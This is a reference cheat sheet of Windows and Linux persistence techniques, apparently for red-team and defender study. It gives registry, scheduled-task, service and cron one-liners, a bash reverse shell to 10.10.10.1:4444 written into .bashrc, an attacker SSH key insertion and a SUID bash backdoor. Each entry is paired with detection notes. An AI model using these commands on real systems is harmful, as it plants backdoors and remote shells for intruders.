> Persistence Mechanisms
# WINDOWS PERSISTENCE
# Reference list, not a runnable script: cmd.exe one-liners (reg, schtasks, sc, copy)
# mixed with one truncated PowerShell line (Set-WMIInstance). Each entry notes the
# privilege it needs and the telemetry a defender can use to catch it.
# 1. Registry Run Keys (survives reboot, runs as user)
# Defender note: value writes under ...\CurrentVersion\Run show up as Sysmon Event ID 13
# (RegistryEvent, value set) when Sysmon is configured for that key, or as Security Event
# ID 4657 with a SACL on the key; diff against an autoruns baseline.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\Users\ram\AppData\Roaming\payload.exe"
# HKLM version requires admin:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\Windows\System32\payload.exe"
# 2. Scheduled Task (survives reboot, can run as SYSTEM)
# /ru SYSTEM needs an elevated prompt. Defender note: task creation is Security Event ID 4698
# (audit "Other Object Access Events"); the task XML under C:\Windows\System32\Tasks is also
# a simple thing to baseline.
schtasks /create /tn "WindowsUpdate" /tr "C:\temp\payload.exe" /sc ONLOGON /ru SYSTEM
# No /ru here, so this one runs as the creating user; a task action containing
# "-WindowStyle Hidden" is a cheap hunting string.
schtasks /create /tn "SecurityScan" /tr "powershell -WindowStyle Hidden -File C:\temp\p.ps1" /sc MINUTE /mo 30
# 3. Windows Service
# Requires admin; sc.exe syntax needs the space after "binPath=" and "start=".
# Defender note: new service installs log System Event ID 7045 (Service Control Manager)
# and Security Event ID 4697 — a service whose binary lives under C:\temp is a strong signal.
sc create "WindowsDefenderHelper" binPath= "C:\temp\payload.exe" start= auto
sc start "WindowsDefenderHelper"
# 4. Startup Folder
# Runs at the user's next interactive logon with that user's rights; %APPDATA% expands only
# in cmd.exe. Defender note: file creates in this folder (Sysmon Event ID 11) are easy to alert on.
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
# 5. WMI Event Subscription (stealthy — no files on disk)
# This line is truncated ("...") and only creates the filter; a consumer and a
# __FilterToConsumerBinding are also needed. Defender note: Sysmon Event IDs 19/20/21
# cover WMI filter, consumer and binding creation; audit root\subscription with Get-CimInstance.
$filter = Set-WMIInstance -Class __EventFilter -Namespace root\subscription ...
# See full: github.com/mattifestation/WMIBackdoor
# 6. DLL Hijacking persistence
# Drop malicious DLL in app directory — loaded on every app start
# Defender note: Sysmon Event ID 7 (ImageLoad) for unsigned DLLs loading from user-writable
# application directories; mitigate by keeping applications under Program Files and
# tightening directory ACLs so the application folder is not writable by the user.
# LINUX PERSISTENCE
# Reference list of one-liners; each needs the stated privilege and leaves a file-system
# trace that the matching defender note points at.
# 1. Cron job
# System crontab entries carry a user field ("root" here), so this runs as root every
# minute; appending to /etc/crontab itself needs root. Defender note: auditd watch on
# /etc/crontab, /etc/cron.d and /var/spool/cron (-w /etc/crontab -p wa -k cron) and
# alert on cron children executing anything under /tmp.
echo "* * * * * root /tmp/.hidden/payload.sh" >> /etc/crontab
# Or user cron:
# Per-user crontab format has no user field; the job runs every 5 minutes as the invoking user.
# Defender note: `crontab -l` per user (or the spool directory) gives the list to baseline.
(crontab -l; echo "*/5 * * * * /tmp/.shell") | crontab -
# 2. .bashrc / .bash_profile (runs on every login)
# ~/.bashrc is sourced by every interactive shell, not just logins; ~/.bash_profile is the
# login-shell hook. The appended line is a bash reverse shell to 10.10.10.1:4444 via /dev/tcp.
# Defender note: a /dev/tcp string in a dotfile is a high-signal indicator; file-integrity
# monitoring on home dotfiles plus egress filtering to unexpected ports both catch it.
echo "bash -i >& /dev/tcp/10.10.10.1/4444 0>&1" >> ~/.bashrc
# 3. SSH authorized_keys (permanent key access)
# ATTACKER_KEY is a placeholder for the key to add. Defender note: diff authorized_keys
# against the expected key set; sshd's AuthorizedKeysFile / AuthorizedKeysCommand can
# move key management out of user-writable home directories entirely.
mkdir -p ~/.ssh && echo "ssh-rsa AAAAB3Nza...ATTACKER_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# 4. SUID backdoor
# cp (without -p) creates the copy owned by whoever runs it, so the setuid bit only confers
# root if both commands run as root; a /tmp mounted nosuid ignores the bit.
cp /bin/bash /tmp/.bash_suid
chmod +s /tmp/.bash_suid
# Run: /tmp/.bash_suid -p → root shell
# Defender note: `find / -perm -4000 -type f` against a baseline of known setuid binaries;
# mount /tmp, /var/tmp and /dev/shm with nosuid.
# 5. /etc/rc.local (runs at boot as root)
# Only effective where the init system still honours /etc/rc.local (systemd does so through
# rc-local.service); on many current distributions the file is absent or not executable,
# so presumably this needs checking per target — TODO confirm.
# Defender note: auditd watch on /etc/rc.local (-w /etc/rc.local -p wa) and a baseline of
# boot-time scripts and units.
echo "/tmp/payload &" >> /etc/rc.local